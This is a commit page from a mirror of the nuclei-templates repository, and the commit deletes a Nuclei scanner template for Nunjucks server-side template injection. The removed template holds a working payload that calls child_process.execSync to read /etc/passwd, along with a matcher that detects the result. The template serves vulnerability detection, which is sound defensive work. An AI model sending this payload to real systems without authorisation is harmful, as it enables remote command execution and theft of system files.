daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete node-nunjucks-ssti.yaml

patch-1
Prince Chaddha 2021-08-16 16:41:58 +05:30 committed by GitHub
parent d3a379e112
commit d45887f9f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
vulnerabilities/other/node-nunjucks-ssti.yaml
View File

@ -1,23 +0,0 @@
id: node-nunjucks-ssti
info:
name: Node Nunjucks SSTI
description: Nunjucks is a template engine for by Jinja2 used to develop web applications on Node.js web frameworks as Express or Connect.
reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
author: geeknik
severity: high
tags: node,nunjucks,ssti
requests:
- method: GET
path:
- "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200